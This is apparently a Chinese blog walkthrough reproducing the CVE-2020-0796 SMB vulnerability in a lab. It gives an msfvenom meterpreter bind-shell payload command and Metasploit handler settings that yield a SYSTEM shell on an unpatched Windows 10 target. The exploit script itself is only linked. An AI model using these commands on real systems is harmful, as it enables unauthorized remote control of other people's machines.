CVE-2020-0796复现

简单来说,适合内网渗透,除非有人把win10放在了公网上。
危害:拿到shell和系统权限。
利用难度:简单。

1、受影响的系统版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

复现的话,推荐用这个镜像。

ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

进去之后把windows防护墙关掉。

2、复现

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

生成evil.py,把buf变量改成USER_PAYLOAD,同时,将每行前面加入b,代表byte,后面脚本没有这个会报错。
在这里插入图片描述
然后将启动msf,进行监听。

msf > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > set rhost 172.16.230.165
rhost => 172.16.230.165
msf5 exploit(multi/handler) > exploit

在这里插入图片描述
运行脚本,使用python3。
在这里插入图片描述
执行完毕之后,靶机电脑会要求重启。
然后我们这边就会获得一个带有系统权限的shell。
在这里插入图片描述

3、总结

没啥总结的,动起手来是王道。

脚本在这

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值